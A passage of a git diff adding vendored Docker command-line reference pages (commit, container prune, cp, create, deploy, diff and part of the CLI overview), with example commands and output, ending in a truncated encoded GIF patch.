the same URL as the registry. +* `DOCKER_HIDE_LEGACY_COMMANDS` When set, Docker hides "legacy" top-level commands (such as `docker rm`, and + `docker pull`) in `docker help` output, and only `Management commands` per object-type (e.g., `docker container`) are + printed. This may become the default in a future release, at which point this environment-variable is removed. +* `DOCKER_TMPDIR` Location for temporary Docker files. + +Because Docker is developed using Go, you can also use any environment +variables used by the Go runtime. In particular, you may find these useful: + +* `HTTP_PROXY` +* `HTTPS_PROXY` +* `NO_PROXY` + +These Go environment variables are case-insensitive. See the +[Go specification](http://golang.org/pkg/net/http/) for details on these +variables. + +## Configuration files + +By default, the Docker command line stores its configuration files in a +directory called `.docker` within your `$HOME` directory. However, you can +specify a different location via the `DOCKER_CONFIG` environment variable +or the `--config` command line option. If both are specified, then the +`--config` option overrides the `DOCKER_CONFIG` environment variable. +For example: + + docker --config ~/testconfigs/ ps + +Instructs Docker to use the configuration files in your `~/testconfigs/` +directory when running the `ps` command. + +Docker manages most of the files in the configuration directory +and you should not modify them. However, you *can modify* the +`config.json` file to control certain aspects of how the `docker` +command behaves. + +Currently, you can modify the `docker` command behavior using environment +variables or command-line options. You can also use options within +`config.json` to modify some of the same behavior. When using these +mechanisms, you must keep in mind the order of precedence among them. Command +line options override environment variables and environment variables override +properties you specify in a `config.json` file. + +The `config.json` file stores a JSON encoding of several properties: + +The property `HttpHeaders` specifies a set of headers to include in all messages +sent from the Docker client to the daemon. Docker does not try to interpret or +understand these header; it simply puts them into the messages. Docker does +not allow these headers to change any headers it sets for itself. + +The property `psFormat` specifies the default format for `docker ps` output. +When the `--format` flag is not provided with the `docker ps` command, +Docker's client uses this property. If this property is not set, the client +falls back to the default table format. For a list of supported formatting +directives, see the +[**Formatting** section in the `docker ps` documentation](ps.md) + +The property `imagesFormat` specifies the default format for `docker images` output. +When the `--format` flag is not provided with the `docker images` command, +Docker's client uses this property. If this property is not set, the client +falls back to the default table format. For a list of supported formatting +directives, see the [**Formatting** section in the `docker images` documentation](images.md) + +The property `serviceInspectFormat` specifies the default format for `docker +service inspect` output. When the `--format` flag is not provided with the +`docker service inspect` command, Docker's client uses this property. If this +property is not set, the client falls back to the default json format. For a +list of supported formatting directives, see the +[**Formatting** section in the `docker service inspect` documentation](service_inspect.md) + +The property `statsFormat` specifies the default format for `docker +stats` output. When the `--format` flag is not provided with the +`docker stats` command, Docker's client uses this property. If this +property is not set, the client falls back to the default table +format. For a list of supported formatting directives, see +[**Formatting** section in the `docker stats` documentation](stats.md) + +Once attached to a container, users detach from it and leave it running using +the using `CTRL-p CTRL-q` key sequence. This detach key sequence is customizable +using the `detachKeys` property. Specify a `` value for the +property. The format of the `` is a comma-separated list of either +a letter [a-Z], or the `ctrl-` combined with any of the following: + +* `a-z` (a single lowercase alpha character ) +* `@` (at sign) +* `[` (left bracket) +* `\\` (two backward slashes) +* `_` (underscore) +* `^` (caret) + +Your customization applies to all containers started in with your Docker client. +Users can override your custom or the default key sequence on a per-container +basis. To do this, the user specifies the `--detach-keys` flag with the `docker +attach`, `docker exec`, `docker run` or `docker start` command. + +Following is a sample `config.json` file: + + {% raw %} + { + "HttpHeaders": { + "MyHeader": "MyValue" + }, + "psFormat": "table {{.ID}}\\t{{.Image}}\\t{{.Command}}\\t{{.Labels}}", + "imagesFormat": "table {{.ID}}\\t{{.Repository}}\\t{{.Tag}}\\t{{.CreatedAt}}", + "statsFormat": "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}", + "serviceInspectFormat": "pretty", + "detachKeys": "ctrl-e,e" + } + {% endraw %} + +### Notary + +If using your own notary server and a self-signed certificate or an internal +Certificate Authority, you need to place the certificate at +`tls//ca.crt` in your docker config directory. + +Alternatively you can trust the certificate globally by adding it to your system's +list of root Certificate Authorities. + +## Help + +To list the help on any command just execute the command, followed by the +`--help` option. + + $ docker run --help + + Usage: docker run [OPTIONS] IMAGE [COMMAND] [ARG...] + + Run a command in a new container + + Options: + --add-host value Add a custom host-to-IP mapping (host:ip) (default []) + -a, --attach value Attach to STDIN, STDOUT or STDERR (default []) + ... + +## Option types + +Single character command line options can be combined, so rather than +typing `docker run -i -t --name test busybox sh`, +you can write `docker run -it --name test busybox sh`. + +### Boolean + +Boolean options take the form `-d=false`. The value you see in the help text is +the default value which is set if you do **not** specify that flag. If you +specify a Boolean flag without a value, this will set the flag to `true`, +irrespective of the default value. + +For example, running `docker run -d` will set the value to `true`, so your +container **will** run in "detached" mode, in the background. + +Options which default to `true` (e.g., `docker build --rm=true`) can only be +set to the non-default value by explicitly setting them to `false`: + + $ docker build --rm=false . + +### Multi + +You can specify options like `-a=[]` multiple times in a single command line, +for example in these commands: + + $ docker run -a stdin -a stdout -i -t ubuntu /bin/bash + $ docker run -a stdin -a stdout -a stderr ubuntu /bin/ls + +Sometimes, multiple options can call for a more complex value string as for +`-v`: + + $ docker run -v /host:/container example/mysql + +> **Note:** +> Do not use the `-t` and `-a stderr` options together due to +> limitations in the `pty` implementation. All `stderr` in `pty` mode +> simply goes to `stdout`. + +### Strings and Integers + +Options like `--name=""` expect a string, and they +can only be specified once. Options like `-c=0` +expect an integer, and they can only be specified once. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/commit.md b/vendor/github.com/docker/docker/docs/reference/commandline/commit.md new file mode 100644 index 0000000000..8f971a5d95 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/commit.md @@ -0,0 +1,93 @@ +--- +title: "commit" +description: "The commit command description and usage" +keywords: "commit, file, changes" +--- + + + +# commit + +```markdown +Usage: docker commit [OPTIONS] CONTAINER [REPOSITORY[:TAG]] + +Create a new image from a container's changes + +Options: + -a, --author string Author (e.g., "John Hannibal Smith ") + -c, --change value Apply Dockerfile instruction to the created image (default []) + --help Print usage + -m, --message string Commit message + -p, --pause Pause container during commit (default true) +``` + +It can be useful to commit a container's file changes or settings into a new +image. This allows you debug a container by running an interactive shell, or to +export a working dataset to another server. Generally, it is better to use +Dockerfiles to manage your images in a documented and maintainable way. +[Read more about valid image names and tags](tag.md). + +The commit operation will not include any data contained in +volumes mounted inside the container. + +By default, the container being committed and its processes will be paused +while the image is committed. This reduces the likelihood of encountering data +corruption during the process of creating the commit. If this behavior is +undesired, set the `--pause` option to false. + +The `--change` option will apply `Dockerfile` instructions to the image that is +created. Supported `Dockerfile` instructions: +`CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`LABEL`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` + +## Commit a container + + $ docker ps + ID IMAGE COMMAND CREATED STATUS PORTS + c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours + 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours + $ docker commit c3f279d17e0a svendowideit/testimage:version3 + f5283438590d + $ docker images + REPOSITORY TAG ID CREATED SIZE + svendowideit/testimage version3 f5283438590d 16 seconds ago 335.7 MB + +## Commit a container with new configurations + + {% raw %} + $ docker ps + ID IMAGE COMMAND CREATED STATUS PORTS + c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours + 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours + $ docker inspect -f "{{ .Config.Env }}" c3f279d17e0a + [HOME=/ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin] + $ docker commit --change "ENV DEBUG true" c3f279d17e0a svendowideit/testimage:version3 + f5283438590d + $ docker inspect -f "{{ .Config.Env }}" f5283438590d + [HOME=/ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin DEBUG=true] + {% endraw %} + +## Commit a container with new `CMD` and `EXPOSE` instructions + + $ docker ps + ID IMAGE COMMAND CREATED STATUS PORTS + c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours + 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours + + $ docker commit --change='CMD ["apachectl", "-DFOREGROUND"]' -c "EXPOSE 80" c3f279d17e0a svendowideit/testimage:version4 + f5283438590d + + $ docker run -d svendowideit/testimage:version4 + 89373736e2e7f00bc149bd783073ac43d0507da250e999f3f1036e0db60817c0 + + $ docker ps + ID IMAGE COMMAND CREATED STATUS PORTS + 89373736e2e7 testimage:version4 "apachectl -DFOREGROU" 3 seconds ago Up 2 seconds 80/tcp + c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours + 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md new file mode 100644 index 0000000000..43156406ec --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md @@ -0,0 +1,47 @@ +--- +title: "container prune" +description: "Remove all stopped containers" +keywords: container, prune, delete, remove +--- + + + +# container prune + +```markdown +Usage: docker container prune [OPTIONS] + +Remove all stopped containers + +Options: + -f, --force Do not prompt for confirmation + --help Print usage +``` + +## Examples + +```bash +$ docker container prune +WARNING! This will remove all stopped containers. +Are you sure you want to continue? [y/N] y +Deleted Containers: +4a7f7eebae0f63178aff7eb0aa39cd3f0627a203ab2df258c1a00b456cf20063 +f98f9c2aa1eaf727e4ec9c0283bc7d4aa4762fbdba7f26191f26c97f64090360 + +Total reclaimed space: 212 B +``` + +## Related information + +* [system df](system_df.md) +* [volume prune](volume_prune.md) +* [image prune](image_prune.md) +* [network prune](network_prune.md) +* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/cp.md b/vendor/github.com/docker/docker/docs/reference/commandline/cp.md new file mode 100644 index 0000000000..fcfd35fce1 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/cp.md @@ -0,0 +1,112 @@ +--- +title: "cp" +description: "The cp command description and usage" +keywords: "copy, container, files, folders" +--- + + + +# cp + +```markdown +Usage: docker cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|- + docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH + +Copy files/folders between a container and the local filesystem + +Use '-' as the source to read a tar archive from stdin +and extract it to a directory destination in a container. +Use '-' as the destination to stream a tar archive of a +container source to stdout. + +Options: + -L, --follow-link Always follow symbol link in SRC_PATH + --help Print usage +``` + +The `docker cp` utility copies the contents of `SRC_PATH` to the `DEST_PATH`. +You can copy from the container's file system to the local machine or the +reverse, from the local filesystem to the container. If `-` is specified for +either the `SRC_PATH` or `DEST_PATH`, you can also stream a tar archive from +`STDIN` or to `STDOUT`. The `CONTAINER` can be a running or stopped container. +The `SRC_PATH` or `DEST_PATH` can be a file or directory. + +The `docker cp` command assumes container paths are relative to the container's +`/` (root) directory. This means supplying the initial forward slash is optional; +The command sees `compassionate_darwin:/tmp/foo/myfile.txt` and +`compassionate_darwin:tmp/foo/myfile.txt` as identical. Local machine paths can +be an absolute or relative value. The command interprets a local machine's +relative paths as relative to the current working directory where `docker cp` is +run. + +The `cp` command behaves like the Unix `cp -a` command in that directories are +copied recursively with permissions preserved if possible. Ownership is set to +the user and primary group at the destination. For example, files copied to a +container are created with `UID:GID` of the root user. Files copied to the local +machine are created with the `UID:GID` of the user which invoked the `docker cp` +command. If you specify the `-L` option, `docker cp` follows any symbolic link +in the `SRC_PATH`. `docker cp` does *not* create parent directories for +`DEST_PATH` if they do not exist. + +Assuming a path separator of `/`, a first argument of `SRC_PATH` and second +argument of `DEST_PATH`, the behavior is as follows: + +- `SRC_PATH` specifies a file + - `DEST_PATH` does not exist + - the file is saved to a file created at `DEST_PATH` + - `DEST_PATH` does not exist and ends with `/` + - Error condition: the destination directory must exist. + - `DEST_PATH` exists and is a file + - the destination is overwritten with the source file's contents + - `DEST_PATH` exists and is a directory + - the file is copied into this directory using the basename from + `SRC_PATH` +- `SRC_PATH` specifies a directory + - `DEST_PATH` does not exist + - `DEST_PATH` is created as a directory and the *contents* of the source + directory are copied into this directory + - `DEST_PATH` exists and is a file + - Error condition: cannot copy a directory to a file + - `DEST_PATH` exists and is a directory + - `SRC_PATH` does not end with `/.` + - the source directory is copied into this directory + - `SRC_PATH` does end with `/.` + - the *content* of the source directory is copied into this + directory + +The command requires `SRC_PATH` and `DEST_PATH` to exist according to the above +rules. If `SRC_PATH` is local and is a symbolic link, the symbolic link, not +the target, is copied by default. To copy the link target and not the link, specify +the `-L` option. + +A colon (`:`) is used as a delimiter between `CONTAINER` and its path. You can +also use `:` when specifying paths to a `SRC_PATH` or `DEST_PATH` on a local +machine, for example `file:name.txt`. If you use a `:` in a local machine path, +you must be explicit with a relative or absolute path, for example: + + `/path/to/file:name.txt` or `./file:name.txt` + +It is not possible to copy certain system files such as resources under +`/proc`, `/sys`, `/dev`, [tmpfs](run.md#mount-tmpfs-tmpfs), and mounts created by +the user in the container. However, you can still copy such files by manually +running `tar` in `docker exec`. For example (consider `SRC_PATH` and `DEST_PATH` +are directories): + + $ docker exec foo tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | tar Cxf DEST_PATH - + +or + + $ tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | docker exec -i foo tar Cxf DEST_PATH - + + +Using `-` as the `SRC_PATH` streams the contents of `STDIN` as a tar archive. +The command extracts the content of the tar to the `DEST_PATH` in container's +filesystem. In this case, `DEST_PATH` must specify a directory. Using `-` as +the `DEST_PATH` streams the contents of the resource as a tar archive to `STDOUT`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/create.md b/vendor/github.com/docker/docker/docs/reference/commandline/create.md new file mode 100644 index 0000000000..e6582e4a38 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/create.md @@ -0,0 +1,211 @@ +--- +title: "create" +description: "The create command description and usage" +keywords: "docker, create, container" +--- + + + +# create + +Creates a new container. + +```markdown +Usage: docker create [OPTIONS] IMAGE [COMMAND] [ARG...] + +Create a new container + +Options: + --add-host value Add a custom host-to-IP mapping (host:ip) (default []) + -a, --attach value Attach to STDIN, STDOUT or STDERR (default []) + --blkio-weight value Block IO (relative weight), between 10 and 1000 + --blkio-weight-device value Block IO weight (relative device weight) (default []) + --cap-add value Add Linux capabilities (default []) + --cap-drop value Drop Linux capabilities (default []) + --cgroup-parent string Optional parent cgroup for the container + --cidfile string Write the container ID to the file + --cpu-count int The number of CPUs available for execution by the container. + Windows daemon only. On Windows Server containers, this is + approximated as a percentage of total CPU usage. + --cpu-percent int CPU percent (Windows only) + --cpu-period int Limit CPU CFS (Completely Fair Scheduler) period + --cpu-quota int Limit CPU CFS (Completely Fair Scheduler) quota + -c, --cpu-shares int CPU shares (relative weight) + --cpus NanoCPUs Number of CPUs (default 0.000) + --cpu-rt-period int Limit the CPU real-time period in microseconds + --cpu-rt-runtime int Limit the CPU real-time runtime in microseconds + --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) + --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) + --device value Add a host device to the container (default []) + --device-read-bps value Limit read rate (bytes per second) from a device (default []) + --device-read-iops value Limit read rate (IO per second) from a device (default []) + --device-write-bps value Limit write rate (bytes per second) to a device (default []) + --device-write-iops value Limit write rate (IO per second) to a device (default []) + --disable-content-trust Skip image verification (default true) + --dns value Set custom DNS servers (default []) + --dns-option value Set DNS options (default []) + --dns-search value Set custom DNS search domains (default []) + --entrypoint string Overwrite the default ENTRYPOINT of the image + -e, --env value Set environment variables (default []) + --env-file value Read in a file of environment variables (default []) + --expose value Expose a port or a range of ports (default []) + --group-add value Add additional groups to join (default []) + --health-cmd string Command to run to check health + --health-interval duration Time between running the check (ns|us|ms|s|m|h) (default 0s) + --health-retries int Consecutive failures needed to report unhealthy + --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s) + --help Print usage + -h, --hostname string Container host name + --init Run an init inside the container that forwards signals and reaps processes + --init-path string Path to the docker-init binary + -i, --interactive Keep STDIN open even if not attached + --io-maxbandwidth string Maximum IO bandwidth limit for the system drive (Windows only) + --io-maxiops uint Maximum IOps limit for the system drive (Windows only) + --ip string Container IPv4 address (e.g. 172.30.100.104) + --ip6 string Container IPv6 address (e.g. 2001:db8::33) + --ipc string IPC namespace to use + --isolation string Container isolation technology + --kernel-memory string Kernel memory limit + -l, --label value Set meta data on a container (default []) + --label-file value Read in a line delimited file of labels (default []) + --link value Add link to another container (default []) + --link-local-ip value Container IPv4/IPv6 link-local addresses (default []) + --log-driver string Logging driver for the container + --log-opt value Log driver options (default []) + --mac-address string Container MAC address (e.g. 92:d0:c6:0a:29:33) + -m, --memory string Memory limit + --memory-reservation string Memory soft limit + --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap + --memory-swappiness int Tune container memory swappiness (0 to 100) (default -1) + --name string Assign a name to the container + --network-alias value Add network-scoped alias for the container (default []) + --network string Connect a container to a network (default "default") + 'bridge': create a network stack on the default Docker bridge + 'none': no networking + 'container:': reuse another container's network stack + 'host': use the Docker host network stack + '|': connect to a user-defined network + --no-healthcheck Disable any container-specified HEALTHCHECK + --oom-kill-disable Disable OOM Killer + --oom-score-adj int Tune host's OOM preferences (-1000 to 1000) + --pid string PID namespace to use + --pids-limit int Tune container pids limit (set -1 for unlimited), kernel >= 4.3 + --privileged Give extended privileges to this container + -p, --publish value Publish a container's port(s) to the host (default []) + -P, --publish-all Publish all exposed ports to random ports + --read-only Mount the container's root filesystem as read only + --restart string Restart policy to apply when a container exits (default "no") + Possible values are: no, on-failure[:max-retry], always, unless-stopped + --rm Automatically remove the container when it exits + --runtime string Runtime to use for this container + --security-opt value Security Options (default []) + --shm-size string Size of /dev/shm, default value is 64MB. + The format is ``. `number` must be greater than `0`. + Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), + or `g` (gigabytes). If you omit the unit, the system uses bytes. + --stop-signal string Signal to stop a container, SIGTERM by default (default "SIGTERM") + --stop-timeout=10 Timeout (in seconds) to stop a container + --storage-opt value Storage driver options for the container (default []) + --sysctl value Sysctl options (default map[]) + --tmpfs value Mount a tmpfs directory (default []) + -t, --tty Allocate a pseudo-TTY + --ulimit value Ulimit options (default []) + -u, --user string Username or UID (format: [:]) + --userns string User namespace to use + 'host': Use the Docker host user namespace + '': Use the Docker daemon user namespace specified by `--userns-remap` option. + --uts string UTS namespace to use + -v, --volume value Bind mount a volume (default []). The format + is `[host-src:]container-dest[:]`. + The comma-delimited `options` are [rw|ro], + [z|Z], [[r]shared|[r]slave|[r]private], and + [nocopy]. The 'host-src' is an absolute path + or a name value. + --volume-driver string Optional volume driver for the container + --volumes-from value Mount volumes from the specified container(s) (default []) + -w, --workdir string Working directory inside the container +``` + +The `docker create` command creates a writeable container layer over the +specified image and prepares it for running the specified command. The +container ID is then printed to `STDOUT`. This is similar to `docker run -d` +except the container is never started. You can then use the +`docker start ` command to start the container at any point. + +This is useful when you want to set up a container configuration ahead of time +so that it is ready to start when you need it. The initial status of the +new container is `created`. + +Please see the [run command](run.md) section and the [Docker run reference](../run.md) for more details. + +## Examples + + $ docker create -t -i fedora bash + 6d8af538ec541dd581ebc2a24153a28329acb5268abe5ef868c1f1a261221752 + $ docker start -a -i 6d8af538ec5 + bash-4.2# + +As of v1.4.0 container volumes are initialized during the `docker create` phase +(i.e., `docker run` too). For example, this allows you to `create` the `data` +volume container, and then use it from another container: + + $ docker create -v /data --name data ubuntu + 240633dfbb98128fa77473d3d9018f6123b99c454b3251427ae190a7d951ad57 + $ docker run --rm --volumes-from data ubuntu ls -la /data + total 8 + drwxr-xr-x 2 root root 4096 Dec 5 04:10 . + drwxr-xr-x 48 root root 4096 Dec 5 04:11 .. + +Similarly, `create` a host directory bind mounted volume container, which can +then be used from the subsequent container: + + $ docker create -v /home/docker:/docker --name docker ubuntu + 9aa88c08f319cd1e4515c3c46b0de7cc9aa75e878357b1e96f91e2c773029f03 + $ docker run --rm --volumes-from docker ubuntu ls -la /docker + total 20 + drwxr-sr-x 5 1000 staff 180 Dec 5 04:00 . + drwxr-xr-x 48 root root 4096 Dec 5 04:13 .. + -rw-rw-r-- 1 1000 staff 3833 Dec 5 04:01 .ash_history + -rw-r--r-- 1 1000 staff 446 Nov 28 11:51 .ashrc + -rw-r--r-- 1 1000 staff 25 Dec 5 04:00 .gitconfig + drwxr-sr-x 3 1000 staff 60 Dec 1 03:28 .local + -rw-r--r-- 1 1000 staff 920 Nov 28 11:51 .profile + drwx--S--- 2 1000 staff 460 Dec 5 00:51 .ssh + drwxr-xr-x 32 1000 staff 1140 Dec 5 04:01 docker + +Set storage driver options per container. + + $ docker create -it --storage-opt size=120G fedora /bin/bash + +This (size) will allow to set the container rootfs size to 120G at creation time. +This option is only available for the `devicemapper`, `btrfs`, `overlay2`, +`windowsfilter` and `zfs` graph drivers. +For the `devicemapper`, `btrfs`, `windowsfilter` and `zfs` graph drivers, +user cannot pass a size less than the Default BaseFS Size. +For the `overlay2` storage driver, the size option is only available if the +backing fs is `xfs` and mounted with the `pquota` mount option. +Under these conditions, user can pass any size less then the backing fs size. + +### Specify isolation technology for container (--isolation) + +This option is useful in situations where you are running Docker containers on +Windows. The `--isolation=` option sets a container's isolation +technology. On Linux, the only supported is the `default` option which uses +Linux namespaces. On Microsoft Windows, you can specify these values: + + +| Value | Description | +|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| +| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value if the +daemon is running on Windows server, or `hyperv` if running on Windows client. | +| `process` | Namespace isolation only. | +| `hyperv` | Hyper-V hypervisor partition-based isolation. | + +Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md b/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md new file mode 100644 index 0000000000..53074b2fd4 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md @@ -0,0 +1,101 @@ +--- +title: "deploy" +description: "The deploy command description and usage" +keywords: "stack, deploy" +advisory: "experimental" +--- + + + +# deploy (alias for stack deploy) (experimental) + +```markdown +Usage: docker deploy [OPTIONS] STACK + +Deploy a new stack or update an existing stack + +Aliases: + deploy, up + +Options: + --bundle-file string Path to a Distributed Application Bundle file + --compose-file string Path to a Compose file + --help Print usage + --with-registry-auth Send registry authentication details to Swarm agents +``` + +Create and update a stack from a `compose` or a `dab` file on the swarm. This command +has to be run targeting a manager node. + +## Compose file + +The `deploy` command supports compose file version `3.0` and above. + +```bash +$ docker stack deploy --compose-file docker-compose.yml vossibility +Ignoring unsupported options: links + +Creating network vossibility_vossibility +Creating network vossibility_default +Creating service vossibility_nsqd +Creating service vossibility_logstash +Creating service vossibility_elasticsearch +Creating service vossibility_kibana +Creating service vossibility_ghollector +Creating service vossibility_lookupd +``` + +You can verify that the services were correctly created + +``` +$ docker service ls +ID NAME MODE REPLICAS IMAGE +29bv0vnlm903 vossibility_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4awt47624qwh vossibility_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa +7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 +9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe +axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba +``` + +## DAB file + +```bash +$ docker stack deploy --bundle-file vossibility-stack.dab vossibility +Loading bundle from vossibility-stack.dab +Creating service vossibility_elasticsearch +Creating service vossibility_kibana +Creating service vossibility_logstash +Creating service vossibility_lookupd +Creating service vossibility_nsqd +Creating service vossibility_vossibility-collector +``` + +You can verify that the services were correctly created: + +```bash +$ docker service ls +ID NAME MODE REPLICAS IMAGE +29bv0vnlm903 vossibility_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4awt47624qwh vossibility_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa +7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 +9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe +axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba +``` + +## Related information + +* [stack config](stack_config.md) +* [stack deploy](stack_deploy.md) +* [stack ls](stack_ls.md) +* [stack ps](stack_ps.md) +* [stack rm](stack_rm.md) +* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/diff.md b/vendor/github.com/docker/docker/docs/reference/commandline/diff.md new file mode 100644 index 0000000000..be27678dcd --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/diff.md @@ -0,0 +1,48 @@ +--- +title: "diff" +description: "The diff command description and usage" +keywords: "list, changed, files, container" +--- + + + +# diff + +```markdown +Usage: docker diff CONTAINER + +Inspect changes on a container's filesystem + +Options: + --help Print usage +``` + +List the changed files and directories in a container᾿s filesystem. + There are 3 events that are listed in the `diff`: + +1. `A` - Add +2. `D` - Delete +3. `C` - Change + +For example: + + $ docker diff 7bb0e258aefe + + C /dev + A /dev/kmsg + C /etc + A /etc/mtab + A /go + A /go/src + A /go/src/github.com + A /go/src/github.com/docker + A /go/src/github.com/docker/docker + A /go/src/github.com/docker/docker/.git + .... diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif b/vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif new file mode 100644 index 0000000000000000000000000000000000000000..5894ca270e002758b8f332141e00356e42868880 GIT binary patch literal 35785 zcmd3tS6CBW*sj+UAPFD|HS{DP9Sl`K#LzngL_|~wh=>J0Kv6{0(5o7H5isItu^ai_j`|%i=(+kus7_0yaNA47>mV; zii%50N=ZvgDgGCEGFeScO+{N+4I~zJ0sDe?UNh-Oink491>4dt5?8J@)TEc<>-SB4TS))R7}c z0#5#yKqfOd`M>PV%*@Kl3O{@HU~X<+Ufw^&#nBi3%dyJJnwpvuwY8_3nwp!NnU^mo zUHLC*U0uDsy_wgqpX=`*930FU9?l;hpO}~^zIX4!ga2}IX6DJ0Csj|M*3QpAfByX4 zyLXpAd{|yy{`>du|2*{nFBkF;6bpbi(EIO({u>h@vdW|Ct&fR;w$@>qcrXN0&a7xY`c7GB^N@v$7r*be2ujX3j+*UQ5MKnGzH`-P`a-L+DspQgL zGnS{dwQ1K_d+kIKblEGe4Lvr5kv=tL^y+OUu+{sPO3R{P3jf$h&{<^j`b)jGH8?>Uq8E^YhU>-JrYIyO&?{s@*Pn_VvWv z_lWH>Csg%*|HL26QuVrV{m1f~v5S%Y)nhTK7CHdXxe$t5S$_BI-p!k_Hdo!P=s$)1P1V~&Y2{vtmfPxsbkVUvk#Wq3)V zblS@z#%UJ_atYsYPfC=^u`fQ`zwwmz6AA*M20sQ|*mJPFTPjiA=v9PmEZ&PE&>0@3;FcQ8sU0l3ENxQ{Cq1 zaEfgMXRxW=ufe|AwB>E3q;9&P>GJiT0rTrL*vz-B!w1XF7kw0(XM$6gn=kP)Y5&OIDE7?Z1{U%Lq8-P{eJ$w=le*56bfS^m>{D7G4J^t zpKF~q-0t7;hmi^bB z(Fds=Qkkvv%5_?0W%J_abw0*CPgTTnId)vCt+;eRAo-Q!Z&5YKkh}TZoH8W}05v+W zOtGW#lB6~O?oqyi9?b^8dOLr8=r%47pYa~_oEI?$IsL$Tr}-cxP&w1GBzJ?vY}MU$ z$R5%+58k|*;xp1>j>^k164M%*4c5I=9zVDtUoGpsJ=A-|HH!b;h_U6bCvO(kNk%~O zKSJ+BNkAp#ngj|!|5iTG_T>t8W8ibuJjk9_DH`j-L`~RI)&Qhf^rJIR=)dMf)~&d_ zL)7&^MU9yrH%cc!4Pi=#`;)ni0H|{NaYT0euiZ4%*@|{w=PG>C`%RjSQV2o+C?f7Z zijk5WfRBkdkR?C+iKhFf1U{;iY3C^#OyR{e8q7DC<^-9cU|l&C24Mc|=DFQd?hN>K zgcmmY3tf1qYs5N?aZ*-cK!}=*5Po}{A2m{^kf}g4hZ?6~^jy9>=a!faX*D5eD~#)t z9kDQr!dBl_OU(peM4!x1iL+V1VQ5^;#~G_Yl}&MvG}HulZ98i47{G1qky&R~I#*+6 znL&mkS&6325U6-N@mna@R=TU$r18f@;d-{M5RaG=8hQKlhkLeSD|PF=Ww~TdZp8Eu z-BNcdY4}vO-I%Y2S@DTViQ5rHi&jiQc{>n*Tm$rg(I~7HD^OVEh>e+ z%|dv0hK;nn7Z%TZDXDe9Ta(VL)(?kp1{x?xJ}QC|xsvgw_cH@>6NE@RQtsoJ65R`1D9r z!z9=<>Q{YQGS_qWC6^*;o!9ysc2+9RxZ4#^O~0`IMY&yf_Nu(?CERkUq6R)e#4H^W 